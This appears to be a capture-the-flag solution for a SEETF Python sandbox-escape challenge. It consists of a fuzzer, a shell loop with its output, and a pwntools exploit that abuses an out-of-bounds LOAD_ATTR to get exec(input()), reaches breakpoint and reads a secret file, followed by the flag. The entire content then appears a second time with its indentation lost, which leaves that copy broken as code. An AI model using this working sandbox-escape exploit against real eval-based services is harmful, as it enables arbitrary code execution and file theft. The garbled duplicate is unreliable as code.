lebr0nli/fuzz.py

## fuzz.py
def gen_payload(name_idx: int) -> str:
    payload = '(0 if 1 else f"'
    for i in range(name_idx):
        payload += "{a_%s}" % i
    payload += '")'
    payload = "(0 if %s else %s)" % (payload, f"a_{name_idx}")
    return payload

payload = f"""
lambda getattr: [getattr(getattr, f"{{x}}") for x in {gen_payload(int(input()))}]
""".strip()
print(payload)

## fuzz.sh
#!/bin/bash

for i in {4000..4500}
do
    echo $i
    echo $i | python fuzz.py | python server.py
done

# $ bash fuzz.sh
# ...
# 4180
# > Traceback (most recent call last):
#   File "server.py", line 16, in <module>
#     print(eval(clear(compile(input("> "), __name__, "eval")), {'__builtins__': {}}, {})(getattr))
#   File "__main__", line 1, in <lambda>
# NameError: name '__len__' is not defined
# ...

## solve.py
from pwn import *


def conn() -> tube:
    if args.LOCAL:
        return remote("localhost", 31337)
    return remote("win.the.seetf.sg", 4000)


def gen_number(i: int) -> str:
    return "[" + ",".join(["0"] * i) + "].x()"


def gen_char(obj: str, obj_str: str, c: str) -> str:
    payload = "f'{%s}'[" % obj
    payload += gen_number(obj_str.find(c))
    payload += "]"
    return payload


def main():
    # Build essential char mapping for __self__, exec, input
    char_mapping = {}
    char_mapping["_"] = gen_char("[].x", str([].__len__), "_")
    char_mapping["s"] = gen_char("[].x", str([].__len__), "s")
    char_mapping["e"] = gen_char("[].x", str([].__len__), "e")
    char_mapping["l"] = gen_char("g", str(getattr), "l")
    char_mapping["f"] = gen_char("g", str(getattr), "f")

    char_mapping["x"] = gen_char("[].x", str([].__len__), "x")
    char_mapping["c"] = gen_char("g", str(getattr), "c")

    char_mapping["i"] = gen_char("g", str(getattr), "i")
    char_mapping["n"] = gen_char("g", str(getattr), "n")
    char_mapping["p"] = gen_char("[].x", str([].__len__), "p")
    char_mapping["u"] = gen_char("g", str(getattr), "u")
    char_mapping["t"] = gen_char("[].x", str([].__len__), "t")

    def gen_str(s: str) -> str:
        return "+".join([char_mapping[c] for c in s])

    # Out-of-bounds LOAD_ATTR
    payload = '(0 if 1 else f"'
    for i in range(4180):  # co_names[4180] -> __len__
        payload += "{a%s}" % i
    payload += '")'
    payload = (
        f"lambda g:(0 if {payload} else %s)"
        % f"g(g(g,{gen_str('__self__')}),{gen_str('exec')})(g(g(g,{gen_str('__self__')}),{gen_str('input')})())"
    )  # exec(input())

    # print(payload)
    with conn() as io:
        io.sendlineafter(b"> ", payload.encode())
        io.sendline(b"g.__self__.breakpoint()")
        io.sendline(b"up")
        io.sendline(b"up")
        io.sendline(b"print(open('super-secret-no-touchy').read())")
        io.interactive()


if __name__ == "__main__":
    main()

# SEE{D0nt_Y0u_h4Te_tYp05_4lL_tHE_t1M3}
	def gen_payload(name_idx: int) -> str:
	payload = '(0 if 1 else f"'
	for i in range(name_idx):
	payload += "{a_%s}" % i
	payload += '")'
	payload = "(0 if %s else %s)" % (payload, f"a_{name_idx}")
	return payload

	payload = f"""
	lambda getattr: [getattr(getattr, f"{{x}}") for x in {gen_payload(int(input()))}]
	""".strip()
	print(payload)
	#!/bin/bash

	for i in {4000..4500}
	do
	echo $i
	echo $i \| python fuzz.py \| python server.py
	done

	# $ bash fuzz.sh
	# ...
	# 4180
	# > Traceback (most recent call last):
	# File "server.py", line 16, in <module>
	# print(eval(clear(compile(input("> "), __name__, "eval")), {'__builtins__': {}}, {})(getattr))
	# File "__main__", line 1, in <lambda>
	# NameError: name '__len__' is not defined
	# ...
	from pwn import *


	def conn() -> tube:
	if args.LOCAL:
	return remote("localhost", 31337)
	return remote("win.the.seetf.sg", 4000)


	def gen_number(i: int) -> str:
	return "[" + ",".join(["0"] * i) + "].x()"


	def gen_char(obj: str, obj_str: str, c: str) -> str:
	payload = "f'{%s}'[" % obj
	payload += gen_number(obj_str.find(c))
	payload += "]"
	return payload


	def main():
	# Build essential char mapping for __self__, exec, input
	char_mapping = {}
	char_mapping["_"] = gen_char("[].x", str([].__len__), "_")
	char_mapping["s"] = gen_char("[].x", str([].__len__), "s")
	char_mapping["e"] = gen_char("[].x", str([].__len__), "e")
	char_mapping["l"] = gen_char("g", str(getattr), "l")
	char_mapping["f"] = gen_char("g", str(getattr), "f")

	char_mapping["x"] = gen_char("[].x", str([].__len__), "x")
	char_mapping["c"] = gen_char("g", str(getattr), "c")

	char_mapping["i"] = gen_char("g", str(getattr), "i")
	char_mapping["n"] = gen_char("g", str(getattr), "n")
	char_mapping["p"] = gen_char("[].x", str([].__len__), "p")
	char_mapping["u"] = gen_char("g", str(getattr), "u")
	char_mapping["t"] = gen_char("[].x", str([].__len__), "t")

	def gen_str(s: str) -> str:
	return "+".join([char_mapping[c] for c in s])

	# Out-of-bounds LOAD_ATTR
	payload = '(0 if 1 else f"'
	for i in range(4180): # co_names[4180] -> __len__
	payload += "{a%s}" % i
	payload += '")'
	payload = (
	f"lambda g:(0 if {payload} else %s)"
	% f"g(g(g,{gen_str('__self__')}),{gen_str('exec')})(g(g(g,{gen_str('__self__')}),{gen_str('input')})())"
	) # exec(input())

	# print(payload)
	with conn() as io:
	io.sendlineafter(b"> ", payload.encode())
	io.sendline(b"g.__self__.breakpoint()")
	io.sendline(b"up")
	io.sendline(b"up")
	io.sendline(b"print(open('super-secret-no-touchy').read())")
	io.interactive()


	if __name__ == "__main__":
	main()

	# SEE{D0nt_Y0u_h4Te_tYp05_4lL_tHE_t1M3}